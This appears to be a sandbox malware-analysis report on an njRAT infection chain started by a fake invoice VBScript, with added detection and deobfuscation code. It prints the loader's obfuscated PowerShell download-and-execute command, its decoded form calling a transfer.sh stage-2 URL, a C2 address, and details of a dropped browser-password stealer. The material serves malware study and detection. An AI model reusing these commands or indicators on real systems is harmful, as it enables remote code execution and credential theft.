Analysis

max time kernel: 152s
max time network: 155s
platform: windows7_x64
resource: win7v20210410
submitted: 24-08-2021 11:38

Static task: static1
Behavioral task: behavioral1
Sample: Invoice#4110.vbs
Resource: win7v20210410

General

Target: Invoice#4110.vbs
Size: 748B
MD5: f88564ad95f97097002bfa11a67d288f
SHA1: 49d1056e48981200f7674432c0562163a8d65db5
SHA256: 410bfd3ac457f14f653b82ad2090dbdd24c5d689d4bb766f6c18e1c1ee8c171a
SHA512: c7448569083d36592caec1360d59ebb5092970cd8d40268e280110fdcbaa7ddff324b71c055febf1e4dee0bd9315ee56c90cfff6b8fa46f72aec84e620099bc6
Malware Config

Extracted
URL: https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt

Extracted
Family: njrat
Version: v4.0
Botnet: Boss
C2: 103.147.184.73:7103
Mutex: Windows
Attributes
reg_key: Windows
splitter: |-F-|

The URL is the stage-2 host that the PowerShell loader in the process tree downloads from; the njRAT configuration is what was extracted from the injected payload. Stock njRAT builds use |'|'| as the field separator, so this build's custom splitter |-F-| should be carried into any delimiter-based network or memory signature: the generic ET rule in Signatures still fires, but a rule keyed on the default delimiter would not.
Signatures

suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
NirSoft WebBrowserPassView (4 IoCs)
Password recovery tool for various web browsers.

resource                                                                      yara_rule
behavioral1/memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp    WebBrowserPassView
\Users\Admin\AppData\Local\Temp\SQL.exe                                       WebBrowserPassView
\Users\Admin\AppData\Local\Temp\SQL.exe                                       WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\SQL.exe                                     WebBrowserPassView

The rule matches both the dropped SQL.exe and a 384KB region inside PID 544 (aspnet_regbrowsers.exe), the injected process that later writes and launches SQL.exe: the NirSoft executable is held in memory by the RAT payload before it is written to disk.
Nirsoft (4 IoCs)

resource                                                                      yara_rule
behavioral1/memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp    Nirsoft
\Users\Admin\AppData\Local\Temp\SQL.exe                                       Nirsoft
\Users\Admin\AppData\Local\Temp\SQL.exe                                       Nirsoft
C:\Users\Admin\AppData\Local\Temp\SQL.exe                                     Nirsoft
Blocklisted process makes network request (1 IoC)

flow  pid   process
6     1392  powershell.exe
Executes dropped EXE (1 IoC)

pid   process
824   SQL.exe
Loads dropped DLL (2 IoCs)

pid   process
544   aspnet_regbrowsers.exe
544   aspnet_regbrowsers.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers target stored browser data such as saved credentials and cookies. Here the reads come from the dropped NirSoft tool (SQL.exe), which is invoked with /stext to write its findings to a text file in the same Temp directory.
Suspicious use of SetThreadContext (1 IoC)

description                         pid   process         target process
PID 1392 set thread context of 544  1392  powershell.exe  aspnet_regbrowsers.exe

Together with the nine WriteProcessMemory calls from 1392 into 544 listed below and the 56KB image that appears at 0x400000 in PID 544 (see the memory dumps), this is the process-hollowing pattern: powershell.exe starts a 32-bit .NET Framework utility, overwrites it with the njRAT payload and redirects its main thread to the new image.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's stock description calls this likely ransomware behaviour, but nothing else in this report (no file encryption, no ransom note) supports that; for an njRAT sample, drive enumeration is expected from its removable-drive spreading routine.
Suspicious behavior: EnumeratesProcesses (3 IoCs)

pid   process
1392  powershell.exe
1392  powershell.exe
824   SQL.exe
Suspicious use of AdjustPrivilegeToken (28 IoCs)

description                         pid   process
Token: SeDebugPrivilege             1392  powershell.exe
Token: SeDebugPrivilege             544   aspnet_regbrowsers.exe
Token: 33                           544   aspnet_regbrowsers.exe   (13 times)
Token: SeIncBasePriorityPrivilege   544   aspnet_regbrowsers.exe   (13 times, alternating with the entry above)

"33" is a privilege LUID the report could not name; in winnt.h, 33 is SE_INC_WORKING_SET_PRIVILEGE (SeIncreaseWorkingSetPrivilege). SeDebugPrivilege in both the loader and the injected host is the usual prerequisite for opening and writing other processes.
Suspicious use of WriteProcessMemory (16 IoCs)

description                       pid   process                 target process
PID 1072 wrote to memory of 1392  1072  WScript.exe             powershell.exe           (3 times)
PID 1392 wrote to memory of 544   1392  powershell.exe          aspnet_regbrowsers.exe   (9 times)
PID 544 wrote to memory of 824    544   aspnet_regbrowsers.exe  SQL.exe                  (4 times)

The three and four writes from a parent into a child it has just created are what process creation itself produces; the nine from powershell.exe into aspnet_regbrowsers.exe carry the injected image and pair with the SetThreadContext call above.
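Detection logic for the chain these signatures describe, as an added example that is not part of the report or of any vendor rule set. It runs a few process-creation rules over constructed Sysmon-style records whose image paths and command lines are copied from the Processes section that follows; the parent of WScript.exe, the plainly written variant of the cradle (PID 7777), the benign admin event (PID 9001) and the .NET utilities other than aspnet_regbrowsers.exe are assumptions added for the example. Its point is the edge case this sample exhibits: a keyword rule for IEX/DownloadString never matches the real command line, because every keyword is assembled at run time, so the rule has to key on the assembly itself.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation records. Image and CommandLine for
# PIDs 1072, 1392, 544 and 824 are copied from the report's process tree; the
# parent of WScript.exe is not recorded there, so it is left as None.
# PID 7777 (the same download cradle written plainly) and PID 9001 (benign
# admin use) are invented controls.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\WScript.exe"
DOTNET_HOST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
OBFUSCATED_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r"$SZXDCFVGBHNJSDFGH = 'https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt';"
    r"$EDRFGHNJMKDEFGHJ = 'nE----------------EbC++++++++++++++++T'.Replace('----------------','t.W').Replace('++++++++++++++++','lIEN');"
    r"$SXDCFVGBHNJXDCFVGBHJK = 'DO*************aDST<<<<<<<<<>>>>>>>>>>>G'.Replace('*************','WnLo').Replace('<<<<<<<<<>>>>>>>>>>>','rIn');"
    r"$SWXDECRFGYHUJISDFVGHJ ='I`EX(n`-------------`c`T $EDRFGHNJMKD<<<<<<<<<<<<<<>>>>>>>>>>>>>>GBHNJSDFGH)'.Replace('-------------','e`W`-Obj`E').Replace('<<<<<<<<<<<<<<>>>>>>>>>>>>>>','EFGHJ).$SXDCFVGBHNJXDCFVGBHJK($SZXDCFV');"
    r"&('I'+'EX')($SWXDECRFGYHUJISDFVGHJ -Join '')|&('I'+'EX');"
)
EVENTS = [
    {"pid": 1072, "image": WSCRIPT, "parent": None,
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#4110.vbs"'},
    {"pid": 1392, "image": PS, "parent": WSCRIPT, "cmdline": OBFUSCATED_CMDLINE},
    {"pid": 544, "image": DOTNET_HOST, "parent": PS, "cmdline": '"' + DOTNET_HOST + '"'},
    {"pid": 824, "image": r"C:\Users\Admin\AppData\Local\Temp\SQL.exe", "parent": DOTNET_HOST,
     "cmdline": r"C:\Users\Admin\AppData\Local\Temp\\SQL.exe /stext C:\Users\Admin\AppData\Local\Temp\FPS6TEMP10.txt"},
    {"pid": 7777, "image": PS, "parent": WSCRIPT,  # invented: same cradle, no obfuscation
     "cmdline": '"' + PS + "\" IEX (New-Object Net.WebClient).DownloadString('https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt')"},
    {"pid": 9001, "image": PS, "parent": r"C:\Windows\explorer.exe",  # invented benign control
     "cmdline": '"' + PS + r'" Get-ChildItem C:\Users\Admin\Documents'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# .NET Framework utilities commonly hijacked as injection hosts. Only
# aspnet_regbrowsers.exe appears in the report; the rest is an assumption.
DOTNET_HOSTS = {"aspnet_regbrowsers.exe", "aspnet_compiler.exe", "regasm.exe",
                "regsvcs.exe", "installutil.exe", "msbuild.exe"}

# What a keyword rule looks for, versus what survives in an obfuscated line.
CRADLE_KEYWORDS = re.compile(r"iex|invoke-expression|downloadstring|webclient", re.I)
OBFUSCATION_MARKERS = [
    re.compile(r"\.Replace\(", re.I),          # strings rebuilt with Replace() chains
    re.compile(r"&\s*\(\s*'[^']*'\s*\+"),      # command name concatenated: &('I'+'EX')
    re.compile(r"[A-Za-z]`[A-Za-z]"),          # backtick inside an identifier: I`EX
    re.compile(r"-Join\s*''", re.I),           # pieces glued with -Join ''
]
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
SCRIPT_IN_TEMP = re.compile(r'\\AppData\\Local\\Temp\\[^"]*\.(vbs|vbe|js|jse|wsf)\b', re.I)
# NirSoft's report-to-file switches (/stext, /shtml, /sverhtml, /sxml, /scomma, /stab)
NIRSOFT_SAVE = re.compile(r"(?:^|\s)/s(?:text|html|verhtml|xml|comma|tab)\b", re.I)


def _name(path):
    return ntpath.basename(path).lower() if path else ""


def rules_for(ev):
    """Return the rule ids that fire on one process-creation event."""
    image, parent, cmd = _name(ev["image"]), _name(ev["parent"]), ev["cmdline"]
    hits = []
    if image in SCRIPT_HOSTS and SCRIPT_IN_TEMP.search(cmd):
        hits.append("script-host-runs-script-from-temp")
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("script-host-spawns-powershell")
    if image == "powershell.exe" and CRADLE_KEYWORDS.search(cmd):
        hits.append("powershell-cradle-keywords")
    if image == "powershell.exe" and sum(bool(m.search(cmd)) for m in OBFUSCATION_MARKERS) >= 2:
        hits.append("powershell-obfuscated-cmdline")
    if image in DOTNET_HOSTS and parent in SCRIPT_HOSTS | {"powershell.exe"}:
        hits.append("dotnet-utility-spawned-by-script-host")
    if TEMP_DIR.search(ev["image"]) and NIRSOFT_SAVE.search(cmd):
        hits.append("temp-exe-nirsoft-save-switch")
    return hits


def detect(events):
    """Map pid -> fired rule ids for every event."""
    return {ev["pid"]: rules_for(ev) for ev in events}


if __name__ == "__main__":
    for pid, hits in detect(EVENTS).items():
        print(pid, hits or "-")
```

The keyword rule fires on PID 7777 and stays silent on PID 1392, while the parent/child rules and the obfuscation-marker rule catch the real chain; in practice the parent-child pairs (script host to PowerShell, PowerShell to an argument-less .NET Framework binary, that binary to a Temp executable with a NirSoft switch) are the durable part of this detection.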
Processes

C:\Windows\System32\WScript.exe (PID 1072)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#4110.vbs"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1392)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt';$EDRFGHNJMKDEFGHJ = 'nE----------------EbC++++++++++++++++T'.Replace('----------------','t.W').Replace('++++++++++++++++','lIEN');$SXDCFVGBHNJXDCFVGBHJK = 'DO*************aDST<<<<<<<<<>>>>>>>>>>>G'.Replace('*************','WnLo').Replace('<<<<<<<<<>>>>>>>>>>>','rIn');$SWXDECRFGYHUJISDFVGHJ ='I`EX(n`-------------`c`T $EDRFGHNJMKD<<<<<<<<<<<<<<>>>>>>>>>>>>>>GBHNJSDFGH)'.Replace('-------------','e`W`-Obj`E').Replace('<<<<<<<<<<<<<<>>>>>>>>>>>>>>','EFGHJ).$SXDCFVGBHNJXDCFVGBHJK($SZXDCFV');&('I'+'EX')($SWXDECRFGYHUJISDFVGHJ -Join '')|&('I'+'EX');
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe (PID 544)
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      - Loads dropped DLL
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp\SQL.exe (PID 824)
        C:\Users\Admin\AppData\Local\Temp\\SQL.exe /stext C:\Users\Admin\AppData\Local\Temp\FPS6TEMP10.txt
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
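Static deobfuscation of the powershell.exe command line in the tree above, as an added example that is not part of the report. Nothing is executed: the script replays the .Replace() chains on the literals copied from the command line, strips the backticks (which are no-ops in Windows PowerShell for the characters this loader escapes) and inlines the variable references, which is enough to recover the real stage-2 command. The function and constant names are the example's own; the case normalisation at the end is cosmetic.

```python
import re

# The four assignments from the powershell.exe command line above, copied
# verbatim: literal, then the .Replace(old, new) chain applied to it.
ASSIGNMENTS = {
    "SZXDCFVGBHNJSDFGH": ("https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt", []),
    "EDRFGHNJMKDEFGHJ": (
        "nE----------------EbC++++++++++++++++T",
        [("----------------", "t.W"), ("++++++++++++++++", "lIEN")],
    ),
    "SXDCFVGBHNJXDCFVGBHJK": (
        "DO*************aDST<<<<<<<<<>>>>>>>>>>>G",
        [("*************", "WnLo"), ("<<<<<<<<<>>>>>>>>>>>", "rIn")],
    ),
    "SWXDECRFGYHUJISDFVGHJ": (
        "I`EX(n`-------------`c`T $EDRFGHNJMKD<<<<<<<<<<<<<<>>>>>>>>>>>>>>GBHNJSDFGH)",
        [
            ("-------------", "e`W`-Obj`E"),
            ("<<<<<<<<<<<<<<>>>>>>>>>>>>>>", "EFGHJ).$SXDCFVGBHNJXDCFVGBHJK($SZXDCFV"),
        ],
    ),
}

# Backtick escapes Windows PowerShell interprets (case-sensitive). `e and `u
# only exist in PowerShell 6+, where this loader would break on its own `e;
# the sandbox ran Windows PowerShell on Windows 7.
PS_ESCAPES = set("0abfnrtv")


def ps_replace(literal, chain):
    """[string]::Replace(old, new) replaces every occurrence, left to right."""
    for old, new in chain:
        literal = literal.replace(old, new)
    return literal


def resolve_variables():
    """Evaluate each assignment; returns {name: value}."""
    return {name: ps_replace(lit, chain) for name, (lit, chain) in ASSIGNMENTS.items()}


def unescape_backticks(code):
    """Drop backticks used as no-op escapes; refuse if a real escape is present."""
    real = {ch for ch in re.findall(r"`(.)", code) if ch in PS_ESCAPES}
    if real:
        raise ValueError(f"real escape sequences present: {sorted(real)}")
    return re.sub(r"`(.)", r"\1", code)


def expand_variables(code, variables):
    """Inline $Name references, longest names first so no name clips a longer one.
    The URL is shown quoted because it is passed as a string argument."""
    for name in sorted(variables, key=len, reverse=True):
        value = variables[name]
        code = code.replace("$" + name, f"'{value}'" if "://" in value else value)
    return code


CANONICAL = {r"new-object": "New-Object", r"net\.webclient": "Net.WebClient",
             r"downloadstring": "DownloadString"}


def deobfuscate():
    """Recover the stage-2 command that &('I'+'EX')(... -Join '') executes."""
    variables = resolve_variables()
    stage = expand_variables(unescape_backticks(variables["SWXDECRFGYHUJISDFVGHJ"]), variables)
    for pattern, proper in CANONICAL.items():   # cosmetic: undo the random casing
        stage = re.sub(pattern, proper, stage, flags=re.I)
    return stage


def payload_url():
    return resolve_variables()["SZXDCFVGBHNJSDFGH"]


if __name__ == "__main__":
    print(deobfuscate())
```

The recovered stage is IEX(New-Object Net.WebClient).DownloadString('https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt'); the outer wrapper on the command line invokes that string with IEX and pipes whatever it emits into a second IEX, so the whole construction is an ordinary download-and-execute cradle whose every keyword is assembled at run time.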
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\FPS6TEMP10.txt
MD5: f3b25701fe362ec84616a93a45ce9998
SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
This is the /stext output of SQL.exe. Its MD5 is that of a file containing only a CRLF pair, so the tool recovered no browser credentials from the sandbox profile; on a real victim this file would hold the stolen passwords.

C:\Users\Admin\AppData\Local\Temp\SQL.exe (also recorded twice as \Users\Admin\AppData\Local\Temp\SQL.exe with identical hashes)
MD5: a38281982740d4bcb1cb71d13508735b
SHA1: 79caace31d17deb4f37c56cd8af4e3731be12324
SHA256: 8ef45a1d9c797be035b17e09a7db9c07a1daf46112c910a4186ddd1048a2e222
SHA512: e615122344dddf825017f6e1123ce66419650adc2691d27f743d1f96ed81f325a2f5f23e5892384a76ff92412028940b413bec7c61454b980b1163eb7da4d2fb
Memory dumps (file size)

memory/544-90-0x0000000000400000-0x000000000040E000-memory.dmp   56KB
memory/544-91-0x000000000040836E-mapping.dmp
memory/544-92-0x0000000000400000-0x000000000040E000-memory.dmp   56KB
memory/544-94-0x0000000075411000-0x0000000075413000-memory.dmp   8KB
memory/544-95-0x0000000005420000-0x0000000005421000-memory.dmp   4KB
memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp   384KB
memory/824-99-0x0000000000000000-mapping.dmp
memory/1072-60-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp  8KB
memory/1392-61-0x0000000000000000-mapping.dmp
memory/1392-63-0x0000000002200000-0x0000000002201000-memory.dmp  4KB
memory/1392-64-0x000000001AC10000-0x000000001AC11000-memory.dmp  4KB
memory/1392-65-0x00000000022E0000-0x00000000022E1000-memory.dmp  4KB
memory/1392-66-0x000000001AB90000-0x000000001AB92000-memory.dmp  8KB
memory/1392-67-0x000000001AB94000-0x000000001AB96000-memory.dmp  8KB
memory/1392-68-0x0000000002240000-0x0000000002241000-memory.dmp  4KB
memory/1392-69-0x000000001B780000-0x000000001B781000-memory.dmp  4KB
memory/1392-70-0x0000000002640000-0x0000000002641000-memory.dmp  4KB
memory/1392-73-0x000000001AB40000-0x000000001AB41000-memory.dmp  4KB
memory/1392-85-0x0000000002720000-0x0000000002721000-memory.dmp  4KB
memory/1392-86-0x0000000002730000-0x0000000002731000-memory.dmp  4KB
memory/1392-87-0x000000001AB9A000-0x000000001ABB9000-memory.dmp  124KB
memory/1392-88-0x000000001C5B0000-0x000000001C5B1000-memory.dmp  4KB
memory/1392-89-0x000000001B4C0000-0x000000001B4C3000-memory.dmp  12KB

The two 56KB dumps of 0x400000-0x40E000 in PID 544, together with the mapping at 0x40836E, are the image that powershell.exe wrote into aspnet_regbrowsers.exe (a Framework, not Framework64, binary, hence the 32-bit image base) before resetting its thread context; the njRAT configuration in Malware Config was extracted from this payload. The 384KB region 544-96 is where the WebBrowserPassView/Nirsoft YARA rules matched, i.e. the NirSoft tool held in memory before being dropped as SQL.exe. The 1392 dumps belong to the 64-bit PowerShell host itself.